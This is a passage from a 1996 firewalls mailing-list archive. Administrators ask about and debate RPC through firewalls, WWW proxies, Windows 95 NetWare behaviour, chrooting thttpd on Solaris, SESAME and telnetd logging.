Applications Conference in December. It's available from: ftp://ftp.engarde.com/pub/IPWatcher_CSAC_Paper.ps.Z Information on TTY-Watcher can be gotten through my company's home page: http://www.engarde.com -Mike Neuman mcn@EnGarde.com En Garde Systems http://www.engarde.com/~mcn From firewalls-owner Mon Feb 5 15:25:44 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA08751 for firewalls-outgoing; Mon, 5 Feb 1996 14:53:35 -0800 (PST) Received: from relay6.UU.NET (relay6.UU.NET [192.48.96.16]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id OAA08744 for ; Mon, 5 Feb 1996 14:53:26 -0800 (PST) Received: from maestro.Maestro.COM by relay6.UU.NET with SMTP id QQabqx03693; Mon, 5 Feb 1996 17:52:26 -0500 (EST) Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA21733; Mon, 5 Feb 96 17:41:52 EST Date: Mon, 5 Feb 1996 17:41:51 -0500 (EST) From: Sick Puppy To: firewalls@GreatCircle.com Subject: Re: Need a few pointers In-Reply-To: <199602052228.GAA19175@relay3.jaring.my> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk There was a very good response to my query. I had no idea there were so many security problems and performance problems associated with WindBlows 95. Sounds like the operating system was written by a couple of drunken cats. In a couple of days I will get the responses together in one file, together with a couple of good web pointers, and pass it on to anyone who wants an e-mailed copy. Sick Puppy, the Cat_Eating_Dawg From firewalls-owner Mon Feb 5 15:35:04 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA09120 for firewalls-outgoing; Mon, 5 Feb 1996 14:58:34 -0800 (PST) Received: from staff.cs.su.OZ.AU (staff.cs.su.OZ.AU [129.78.8.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA09065 for ; Mon, 5 Feb 1996 14:58:06 -0800 (PST) Message-Id: <199602052258.OAA09065@miles.greatcircle.com> Received: from staff.cs.su.oz.au by staff.cs.su.OZ.AU (mail from rex for firewalls@GreatCircle.COM) with MHSnet; Tue, 06 Feb 1996 09:56:57 +1100 Date: Tue, 06 Feb 1996 09:51:53 +1000 From: rex@staff.cs.su.oz.au (Rex di Bona) Subject: www proxies To: gblolmxb@ibmmail.com Reply-To: rex@cs.su.oz.au Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Every commercial firewall should support http/ftp/shttp proxies. If they don't they'll rapidly lose business. the web is overtaking e-mail as the main reason people want to connect to the web. Rex. > From: gblolmxb@ibmmail.com > > > ---- Mail Item Text Follows > Subject WWW Proxy > > I know about telnet & ftp proxies that will allow internal users to > log on to a firewall and access the internet, thus allowing us to > continue using static routing only on our routers (we would only need > to add one more, for the firewalls 'inside' address> Does such a proxy > exist for WWW so that: > > 1. Users can use which-ever browers they like. > 2. The 'standard' winsock.dll, such as provided by FTP with their > Onnet product, can still be used. > > If so, which comercial firewalls support this? From firewalls-owner Mon Feb 5 15:38:59 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA10297 for firewalls-outgoing; Mon, 5 Feb 1996 15:15:00 -0800 (PST) Received: from hosaka.smallworks.com (hosaka.SmallWorks.COM [192.207.126.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA10291 for ; Mon, 5 Feb 1996 15:14:53 -0800 (PST) Received: from butthead.SmallWorks.COM by hosaka.smallworks.com (5.x/SMI-SVR4) id AA06707; Mon, 5 Feb 1996 17:14:00 -0600 Received: by butthead.SmallWorks.COM (4.1/SPARCbook_POP1.3) id AA00392; Mon, 5 Feb 96 17:12:38 CST From: "Jim Thompson" Message-Id: <9602051712.ZM390@butthead.smallworks.com> Date: Mon, 5 Feb 1996 17:12:38 -0600 In-Reply-To: Juan Carlos Machado "CISCO Access Server Configuration" (Feb 5, 2:06pm) References: X-Mailer: Z-Mail (3.2.1 10oct95) To: Juan Carlos Machado , firewalls@GreatCircle.COM Subject: Re: CISCO Access Server Configuration Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk use tacacs+. From firewalls-owner Mon Feb 5 16:08:29 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA13339 for firewalls-outgoing; Mon, 5 Feb 1996 15:52:33 -0800 (PST) Received: from gaia.aoainc.com (gaia.aoainc.com [199.93.216.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA13324 for ; Mon, 5 Feb 1996 15:52:26 -0800 (PST) Received: (from uucp@localhost) by gaia.aoainc.com (8.6.12/8.6.9) id SAA25799; Mon, 5 Feb 1996 18:51:31 -0500 Received: from aoa.aoainc.com(199.93.217.20) by gaia.aoainc.com via smap (V1.3) id sma025793; Mon Feb 5 18:51:03 1996 Received: from albedo.aoainc.com. (albedo.aoainc.com [199.93.217.155]) by aoa.aoainc.com (8.6.9/8.6.9) with SMTP id SAA03059; Mon, 5 Feb 1996 18:51:02 -0500 Message-ID: Date: Mon, 5 Feb 96 18:49:44 -0400 From: "Richard L. Snow" Subject: Re: Need a few pointers To: "sandy bryant" , "Sick Puppy" , firewalls@GreatCircle.COM X-Mailer: VersaTerm Link v1.1.1 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >At 12:40 PM 2/5/96 -0500, Sick Puppy wrote: >>My hind brain keeps telling my forebrain that somewhere it read that >>Windows 95 and Windows NT [] >>sandy bryant wrote: >Maybe you're thinking of the problem Novell networks had with Windows 95? >Since Windows 95 answers the Netware client GetNearestServer call with a >packet claiming to be a Netware server [] My understanding is that Win95 will do this if you set up your workstation to share local printer or disk. The workaround is to make sure localy shared disk/print is turned off in the Network control panel. On a network you can set up a "policy" document which will prevent any user from turning this "feature" on. (Having never done this myself, I parrot the msoft corp line :-) Regards, -Rich Rich Snow rich@aoainc.com (617)864-0201 -----------------------------------------------* Adaptive Optics Associates, Inc. 54 Cambridgepark Dr., Cambridge, MA. 02140 From firewalls-owner Mon Feb 5 16:12:14 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA11178 for firewalls-outgoing; Mon, 5 Feb 1996 15:24:36 -0800 (PST) Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA11171 for ; Mon, 5 Feb 1996 15:24:30 -0800 (PST) Received: from pm2-08.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA18437; Mon, 5 Feb 96 18:22:59 -0500 Date: Mon, 5 Feb 96 18:22:59 -0500 Message-Id: <9602052322.AA18437@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.com From: Frank Willoughby Subject: Re: RPC Across a firewall? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Verily, at 12:39 PM 2/5/96, Richard Giering Jr. allegedly did write: >I know the kind of reaction I'm libel to get but I said I'd check into it.... > >We have developers who are writing apps based upon RPC and demanding that RPC >be opened on the firewall. The idea is to enable users with their own Internet >provider to be able to access Internal applications using RPC/client-server >apps. > >I have some concerns listed below. Can anyone think of anymore? > >1) RPC runs on UDP (right?) and UDP opens a whole other bag of worms >2) RPC and portmapper are hard if not impossible to proxy. >3) RPC is insecure >4) portmapper has many known security holes. > >My reaction has been "if they want to dialup, we'll setup internal modems" > >Is anyone aware of firewall products allow and protect RPC? > >Rick Giering, Firewall Ranger >CCH Inc. Richard, What your programmers are proposing is essentially *lethal* from a security point-of-view as it opens you to a wide variety of attacks. There are many ways of solving the problem without having to resort to RPCs - even more, since you have the option of coding your own solution (an advantage most of us don't have). FWIW, I'd recommend three things for your company: o A security awareness class for your programmers (I strongly suspect that you are only seeing the tip of the iceberg. Taking a look at how existing programs they have written are communicating and handling unexpected exceptions (buffer overflow, etc) probably wouldn't hurt either.) o A brief security assessment of the network & systems in their group (if they are naive enough about RPCs, there are probably a dozen or so other gaping holes that need to be plugged up) o A secure network solution which assures that the business unit can meet their objectives - securely. This is the problem they want solved. I've designed secure networking solutions for a number of companies. Give me a call at the number below & I'll help you as much as I can. Best Regards, Frank The opinions expressed above are of the author and may not necessarily be representative of Fortified Networks Inc. Fortified Networks Inc. - Management & Information Security Consulting Phone: (317) 573-0800 - http://www.fortified.com/fortified Home of the Free Internet Firewall Evaluation Checklist From firewalls-owner Mon Feb 5 16:23:30 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA15249 for firewalls-outgoing; Mon, 5 Feb 1996 16:18:13 -0800 (PST) Received: from dns.eng.auburn.edu (dns.eng.auburn.edu [131.204.10.13]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id QAA15240 for ; Mon, 5 Feb 1996 16:18:04 -0800 (PST) Received: from netman.eng.auburn.edu (netman.eng.auburn.edu [131.204.12.24]) by dns.eng.auburn.edu (v8.7.3/8.6.4) with ESMTP id SAA14147 for ; Mon, 5 Feb 1996 18:17:10 -0600 (CST) From: Doug Hughes Received: from localhost (doug@localhost) by netman.eng.auburn.edu (8.6.4/8.6.4) id SAA04331; Mon, 5 Feb 1996 18:17:07 -0600 Date: Mon, 5 Feb 1996 18:17:07 -0600 Subject: Re: RPC Across a firewall? To: firewalls@greatcircle.com Message-Id: In-Reply-To: <9602051842.AA5369@notes.cch.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > >I know the kind of reaction I'm libel to get but I said I'd check into it.... > >We have developers who are writing apps based upon RPC and demanding that RPC >be opened on the firewall. The idea is to enable users with their own Internet >provider to be able to access Internal applications using RPC/client-server >apps. > >I have some concerns listed below. Can anyone think of anymore? > >1) RPC runs on UDP (right?) and UDP opens a whole other bag of worms RPC runs on top of UDP or TCP (and other protocols, but we'll ignore them for now) >2) RPC and portmapper are hard if not impossible to proxy. well, yeah, it can be messy. You have to examine the packet in more detail too to find the RPC service number. >3) RPC is insecure Out of the box, yes, but it can be secured pretty well. >4) portmapper has many known security holes. yeah, but you can get a new version of portmap and/or rpcbind that is tcp/wrappered. This will work as long as. 1) you have source routing blocked at your external router 2) you have IP spoofing blocked at your external router Versions are available at ftp.win.tue.nl > >My reaction has been "if they want to dialup, we'll setup internal modems" Well, therein lies a different set of problems. :( (but perhaps a set of problems which you are more equipped to handle) [ If you reply to this message, do not CC me on the reply. I subscribe to this list, unless it is a private reply, in which case do not CC the list ] -- ____________________________________________________________________________ Doug Hughes Engineering Network Services System/Net Admin Auburn University doug@eng.auburn.edu Pro is to Con as progress is to congress From firewalls-owner Mon Feb 5 17:45:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA20290 for firewalls-outgoing; Mon, 5 Feb 1996 17:35:58 -0800 (PST) Received: from solarnum.itd.uts.edu.au (solarnum.itd.uts.EDU.AU [138.25.16.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id RAA20264 for ; Mon, 5 Feb 1996 17:35:46 -0800 (PST) Received: from maverick.itd.uts.edu.au (matt@maverick.itd.uts.EDU.AU [138.25.16.41]) by solarnum.itd.uts.edu.au (8.7.3/8.7.1/uts) with ESMTP id MAA29908; Tue, 6 Feb 1996 12:32:24 +1100 (EST) Received: (from matt@localhost) by maverick.itd.uts.edu.au (8.7.3/8.7.3/Jas) id MAA00388; Tue, 6 Feb 1996 12:35:01 +1100 From: Jas (Matthew K) Message-Id: <199602060135.MAA00388@maverick.itd.uts.edu.au> Subject: Re: RPC Across a firewall? To: frankw@in.net (Frank Willoughby) Date: Tue, 6 Feb 1996 12:34:59 +1100 (EST) Cc: firewalls@GreatCircle.COM In-Reply-To: <9602052322.AA18437@su1.in.net> from "Frank Willoughby" at Feb 5, 96 06:22:59 pm X-Ph: ph: +61 2 330 1390 fax: +61 2 330 1999 home: +61 2 9929 0717 X-Pager: +61 2 214 1111 #216098 or pager@maverick.itd.uts.edu.au X-Pgp-Finger: pub 2048/27FB4AE1 1995/09/30 Jas (Matthew K) X-Pgp-Finger: Key fingerprint = 3A1EEDBE7A6D498D E7953FB40A21A6C8 X-Mailer: ELM [version 2.4 PL25] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- Frank Willoughby wrote this... > Richard, > What your programmers are proposing is essentially *lethal* from a > security point-of-view as it opens you to a wide variety of attacks. > There are many ways of solving the problem without having to resort > to RPCs - even more, since you have the option of coding your own > solution (an advantage most of us don't have). > FWIW, I'd recommend three things for your company: > o A security awareness class for your programmers (I strongly > suspect that you are only seeing the tip of the iceberg. Taking > a look at how existing programs they have written are > communicating and handling unexpected exceptions (buffer > overflow, etc) probably wouldn't hurt either.) > o A brief security assessment of the network & systems in their > group (if they are naive enough about RPCs, there are probably a > dozen or so other gaping holes that need to be plugged up) > o A secure network solution which assures that the business unit can > meet their objectives - securely. This is the problem they want > solved. > I've designed secure networking solutions for a number of companies. > Give me a call at the number below & I'll help you as much as I can. frank, this is not necessarily true.. RPC can be secured, and quite easily at that _if_ you know wht you are doing... punching it through a firewall can be difficult, but you can get RPC to do things like a) force it to use one and only one port, b) force it to use only TCP, c) turn on authentification, and fold in encryption. RPC is not the bug bear that most people make it out to be, you just gotta know how to use it properly!!! i have been coding with RPC for almost 2.5 years now, and it _can_ be done, and some things (like authentification) can be done very easily in RPC (far easier than some other methods). please guys, be sure of what you say before you fire away. Matt p.s. i have no qualms in saying that some of the current implementations of RPC servers are insecure (like NFS if not done with SecureNFS or with kerberos).. - -- #!/bin/sh echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sbA0D3F204445524F42snlbxq'|dc;exit Matthew Keenan Data Network Admin Information Technology Division University of Technology Sydney Australia It's nice to be in a position where people apologize because they assume there's humor in your work, based on past experience, but they're not sure where it is. -- Rob Pike -----BEGIN PGP SIGNATURE----- Version: 2.6.2i Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface iQEVAwUBMRawK4SVUk8n+0rhAQEwdgf+NjrWCdcqjvO4l60C7v3tnrL9iN0wDe3A 0wZFPAQuCkrmujMdWuVt7TAmgU+bULurKdFawCFbzQ0Xt+ms7eR8FaT7DOtqVAhK 9QByt/T00oAASgZuvButF+McB13a1CkYDHioFjjxkCeSQxtAqSwzhzvFj0PaUBjy 5ZwFrYoGDKIR9i8xWR4xgB+8IBlxt+POEwLOAMZmBj+eTYR/ttFcCyeQ4IO1glRF YF4NoTQMalfVUy73yQWEkhK0+wmp8C6hE8zozB9TPcmXRMCjxA9S7Y6dE5XskWew aH+SJWJSPCxxXgnsX7NfdnInh4EwDhXYRIsSl6/fejN56xYzOHIxEw== =0rCA -----END PGP SIGNATURE----- From firewalls-owner Mon Feb 5 18:08:56 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA21480 for firewalls-outgoing; Mon, 5 Feb 1996 17:59:48 -0800 (PST) Received: from sandy.sandpiper.com (sandy.sandpiper.com [204.96.232.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id RAA21475 for ; Mon, 5 Feb 1996 17:59:44 -0800 (PST) Received: by sandy.sandpiper.com (4.1/SMI-4.1) id AA20246; Mon, 5 Feb 96 18:00:00 PST Date: Mon, 5 Feb 96 18:00:00 PST From: chris@sandpiper.com (Chris Newton) Message-Id: <9602060200.AA20246@sandy.sandpiper.com> To: firewalls@greatcircle.com Subject: problem with thttpd on solaris 2.x Cc: fc@all.net Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I've been trying to put a secure web server onto a sacrificial lamb in our DMZ, and so decided to use the thhtpd. Unfortunately, due to circumstances beyond my control, the server is running solaris 2.x (i would have preferred SunOS 4.1.x, but that is a different story). Anyway, when i run it normally it works just fine. But when i try to run it chroot, it complains in the libsocket library, when trying to access /dev/tcp (which isn't there of course) I was wondering if the consensus of opinion was to: a) make a /dev/tcp in the chroot tree; b) magically acquire a libsocket which doesn't behave this way; c) give up and don't try to run it chroot. any help, gratefully received chris newton network security sandpiper software consulting From firewalls-owner Mon Feb 5 18:24:06 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA22270 for firewalls-outgoing; Mon, 5 Feb 1996 18:12:00 -0800 (PST) Received: from mcfeely.bsfs.org (mcfeely.bsfs.org [204.91.13.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id SAA22255 for ; Mon, 5 Feb 1996 18:11:54 -0800 (PST) Received: (from wombat@localhost) by mcfeely.bsfs.org (8.6.12/8.6.12) id VAA09272; Mon, 5 Feb 1996 21:08:18 -0500 Date: Mon, 5 Feb 1996 21:08:15 -0500 (EST) From: Rabid Wombat To: "Richard L. Snow" cc: sandy bryant , Sick Puppy , firewalls@GreatCircle.COM Subject: Re: Need a few pointers In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 5 Feb 1996, Richard L. Snow wrote: > > >At 12:40 PM 2/5/96 -0500, Sick Puppy wrote: > >>My hind brain keeps telling my forebrain that somewhere it read that > >>Windows 95 and Windows NT > [] > >>sandy bryant wrote: > >Maybe you're thinking of the problem Novell networks had with Windows 95? > >Since Windows 95 answers the Netware client GetNearestServer call with a > >packet claiming to be a Netware server > [] > > My understanding is that Win95 will do this if you set up your workstation > to share local printer or disk. The workaround is to make sure localy shared > disk/print is turned off in the Network control panel. On a network you can > set up a "policy" document which will prevent any user from turning this > "feature" on. > This looks like a work-around, at best. A number of vendors, such as those marketing comm servers and print servers that use IPX/SPX use SAP to advertise their presence, without responding to a GetNearestServer. Just another Micro$oft "feature". What's the party line on a real fix? From firewalls-owner Mon Feb 5 20:14:07 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA26459 for firewalls-outgoing; Mon, 5 Feb 1996 20:07:26 -0800 (PST) Received: from desiree.teleport.com (desiree.teleport.com [192.108.254.21]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id UAA26454 for ; Mon, 5 Feb 1996 20:07:21 -0800 (PST) Received: from kludge.teleport.com (ip-pdx16-24.teleport.com [206.163.123.216]) by desiree.teleport.com (8.6.12/8.6.9) with SMTP id UAA08663; Mon, 5 Feb 1996 20:05:57 -0800 Message-Id: <199602060405.UAA08663@desiree.teleport.com> Comments: Authenticated sender is From: "Alan Olsen" Organization: Fnord Motor Company To: gblolmxb@ibmmail.com, rex@cs.su.oz.au Date: Mon, 5 Feb 1996 20:08:29 +0000 Subject: Re: www proxies Reply-to: alano@teleport.com CC: firewalls@GreatCircle.COM X-mailer: Pegasus Mail for Windows (v2.23) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Date: Tue, 06 Feb 1996 09:51:53 +1000 > From: rex@staff.cs.su.oz.au (Rex di Bona) > Subject: www proxies > To: gblolmxb@ibmmail.com > Reply-to: rex@cs.su.oz.au > Cc: firewalls@GreatCircle.COM > Every commercial firewall should support http/ftp/shttp proxies. If they > don't they'll rapidly lose business. the web is overtaking e-mail > as the main reason people want to connect to the web. Most of the problems with using a web browser and/or FTP are from misconfigured software and/or firewalls. With Netscape, if you do not allow connections to port 443, secure connections will not work. I am not certain of any additional port requirements for SHTTP. There is one place where Netscape has problems with firewalls. Netscape uses passive ftp. Passive mode tries to open a high port and the firewall balks at the connection. ( Oddly, Mosaic does not have this problem.) Netscape 2.0 has an "autoconfigure" for proxies. I do not have enough information on this to determine if the auto-configure is a security breach in and of itself.) Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction `finger -l alano@teleport.com` for PGP 2.6.2 key http://www.teleport.com/~alano/ Is the operating system half NT or half full? From firewalls-owner Mon Feb 5 20:38:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA27055 for firewalls-outgoing; Mon, 5 Feb 1996 20:24:00 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id UAA27050 for ; Mon, 5 Feb 1996 20:23:56 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-960123) id UAA14523; Mon, 5 Feb 1996 20:20:22 -0800 Received: from relay-4.mail.demon.net(158.152.1.108) by mycroft via smap (V1.3mjr) id sma014519; Mon Feb 5 20:19:40 1996 Received: from post.demon.co.uk ([158.152.1.72]) by relay-4.mail.demon.net id ad09423; 5 Feb 96 22:59 GMT Received: from bifroest.demon.co.uk ([158.152.121.6]) by relay-3.mail.demon.net id aa28824; 5 Feb 96 22:51 GMT X-Sender: (Unverified) Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 5 Feb 1996 22:52:03 +0000 To: firewalls@greatcircle.com From: Ian Miller Subject: Re: Mazama Packet Filter: Misleading advertising Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Darren Reed writes: > * We have used SATAN to analyze MPF installations and verified that > the above security problems are solved by MPF. The current version > of MPF can detect port scans from SATAN and automatically block > all packets from a host running SATAN. [snip...] >Maybe they assumed that their DHB (Dynamic Host Blocking) solved everything >when it blocks out an entire host when it notices a SATAN style attack. > Don't forget the rather spectacular opportunities for denial-of-service attacks such host blocking would offer. Ian From firewalls-owner Mon Feb 5 20:53:33 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA27713 for firewalls-outgoing; Mon, 5 Feb 1996 20:40:56 -0800 (PST) Received: from bifrost.paladin.com (router.paladin.com [199.3.129.207]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id UAA27708 for ; Mon, 5 Feb 1996 20:40:49 -0800 (PST) Received: (from mail@localhost) by bifrost.paladin.com (8.6.12/8.6.9) id XAA08783; Mon, 5 Feb 1996 23:39:34 -0500 Received: from router.paladin.com(199.3.129.207) by bifrost.paladin.com via smap (V1.3) id sma008781; Mon Feb 5 23:39:29 1996 Date: Mon, 5 Feb 1996 23:39:29 -0500 (EST) From: Chris Woods To: KM cc: firewalls@GreatCircle.COM Subject: Re: Need a few pointers In-Reply-To: <9602052109.AA00719@hfsi> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 5 Feb 1996, KM wrote: > > There are other operating systems? :) When did Microsoft buy Wang Fed? ;-) Chris Woods Systems Administrator cjwoods@paladin.com Paladin Computing Solutions 617-273-4226 http://www.paladin.com/chris/ Want the government to control what you are allowed to read and see? "Why, NO!", you say? See http://www.eff.org/blueribbon.html From firewalls-owner Tue Feb 6 01:16:17 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id AAA06377 for firewalls-outgoing; Tue, 6 Feb 1996 00:59:35 -0800 (PST) Received: from alcatel.fr (mail.alcatel-alsthom.fr [193.104.30.131]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id AAA06352 for ; Tue, 6 Feb 1996 00:58:51 -0800 (PST) Received: from alcatel.fr (gatekeeper-ssn.alcatel.fr [155.132.180.241]) by mailgate.alcatel.fr (8.7.3/8.7.3) with ESMTP id JAA18269 for ; Tue, 6 Feb 1996 09:58:16 +0100 Received: from AHQP14 (ahqp14.ahqps.alcatel.fr [155.132.120.211]) by nsfhh5.alcatel.fr (8.7.3/8.7.3) with SMTP id JAA25482 for ; Tue, 6 Feb 1996 09:59:07 +0100 (MET) Message-Id: <199602060859.JAA25482@nsfhh5.alcatel.fr> Comments: Authenticated sender is From: "Kare Presttun" Organization: Alcanet International To: Firewalls@GreatCircle.COM Date: Tue, 6 Feb 1996 10:01:56 +0100 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: More SESAME Reply-to: Kare.Presttun@ansf.alcatel.fr X-mailer: Pegasus Mail for Windows (v2.01) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, I'm sorry for posting such a brief message on SESAME. A bit more explenation follows. It is available from: http://www.esat.kuleuven.ac.be/cosic/sesame.html You can regard it as a kind of enhanced Kerberos, that supports a mix of public and secret key cryptography, delegation of rights, separation of the authentication method from the rest of the system, multiple security domains , cross domain security. It can directly replace Kerberos in DCE. It has an enhanced GSS-API to take advantage of the enhanced services. It is in the public domain (as of today), and Internet drafts are filed to progress it to an RFC. It is an ECMA standard. For more information and source code, check out the above URL. I know this list is about firewalls, but I also know that many of you have wider security interests than just firewalls. Regards, Kare ---------------------------------------------------------- | Kare Presttun Alcanet International | | Tel: +33 1 4058 5614 33, rue Emeriau | | Fax: +33 1 4058 5945 F-75015 Paris | | Kare.Presttun@ansf.alcatel.fr FRANCE | From firewalls-owner Tue Feb 6 04:38:35 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA12379 for firewalls-outgoing; Tue, 6 Feb 1996 04:27:25 -0800 (PST) Received: from sarswati.mindware.soft.net (sarswati.mindware.soft.net [164.164.52.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id EAA12374 for ; Tue, 6 Feb 1996 04:27:18 -0800 (PST) Received: from gangotri.mindware.soft.net by sarswati.mindware.soft.net id aa03553; 6 Feb 96 17:54 IST Received: by gangotri.mindware.soft.net with Microsoft Mail id <31180839@gangotri.mindware.soft.net>; Tue, 06 Feb 96 18:02:33 PST From: Prakash N Purushotham To: "'firewalls@greatcircle.com'" Subject: telnetd Date: Tue, 06 Feb 96 17:53:00 PST Message-ID: <31180839@gangotri.mindware.soft.net> X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Is there any way I can configure telnetd to log the client's IP Address, the login id used, time stamps in syslog? Prakash prakashp@mindware.soft.net From firewalls-owner Tue Feb 6 06:14:00 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA14000 for firewalls-outgoing; Tue, 6 Feb 1996 05:55:52 -0800 (PST) Received: from gatekeeper.qms.com (gatekeeper.qms.com [161.33.3.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA13995 for ; Tue, 6 Feb 1996 05:55:48 -0800 (PST) Received: from sun470.rd.qms.com (sun470.qms.com) by gatekeeper.qms.com (4.1/SMI-4.1) id AA01799; Tue, 6 Feb 96 07:54:59 CST Received: from joker.rd.qms.com by sun470.rd.qms.com (4.1/SMI-4.1) id AA05945; Tue, 6 Feb 96 07:54:57 CST From: smithj@rd.qms.com (John Smith) Received: by joker.rd.qms.com (4.1) id AA01952; Tue, 6 Feb 96 07:54:56 CST Date: Tue, 6 Feb 96 07:54:56 CST Message-Id: <9602061354.AA01952@joker.rd.qms.com> To: Firewalls@greatcircle.com Subject: Socks and Internet News Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Is there a way to safely tunnel NNTP through SOCKS? Since I'm having to 'experiment' on our running firewall I want to make sure I get it right without opening 10k new holes. Thanks for any advice. John Smith john_smith@rd.qms.com From firewalls-owner Tue Feb 6 06:24:27 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA14054 for firewalls-outgoing; Tue, 6 Feb 1996 05:58:41 -0800 (PST) Received: from smtp-gw01.ny.us.ibm.net ([165.87.194.252]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA14049 for ; Tue, 6 Feb 1996 05:58:37 -0800 (PST) From: pcuser@slip133-171.dc.us.ibm.net Received: (from uucp@localhost) by smtp-gw01.ny.us.ibm.net (8.6.9/8.6.9) id NAA41556 for <@smtp-gw01.ny.us.ibm.net:Firewalls@GreatCircle.COM>; Tue, 6 Feb 1996 13:57:47 GMT Message-Id: <199602061357.NAA41556@smtp-gw01.ny.us.ibm.net> Received: from slip133-177.dc.us.ibm.net(129.37.133.177) by smtp-gw01.ny.us.ibm.net via smap (V1.3mjr) id smaOzkDFW; Tue Feb 6 13:57:34 1996 Date: Tue, 6 Feb 96 10:04:23 PST Subject: Firewalls Product Comparison To: @smtp-gw01.ny.us.ibm.net:Firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi guys, I need to prepare a comparative study between Sun´s Firewall 1 and IBM NetSP, for the end of this week. Does anyone Knows where I could find some interesting articles concerning both of these products?? Any help woul be appreciated. Wilmer Caripe EMSCA - ENGINEERING AND MANUFACTURING SYSTEMS CARACAS, VENEZUELA From firewalls-owner Tue Feb 6 06:40:14 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA14807 for firewalls-outgoing; Tue, 6 Feb 1996 06:38:05 -0800 (PST) Received: from protosoft.com ([204.128.207.15]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA14802 for ; Tue, 6 Feb 1996 06:38:01 -0800 (PST) Received: by protosoft.com (4.1/SMI-4.1) id AA10053; Tue, 6 Feb 96 08:36:18 CST Date: Tue, 6 Feb 1996 08:36:17 -0600 (CST) From: Mohammed Ali To: Prakash N Purushotham Cc: "'firewalls@greatcircle.com'" Subject: Re: telnetd In-Reply-To: <31180839@gangotri.mindware.soft.net> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 6 Feb 1996, Prakash N Purushotham wrote: > > Is there any way I can configure telnetd to log the client's > IP Address, the login id used, time stamps in syslog? > How about using TCP 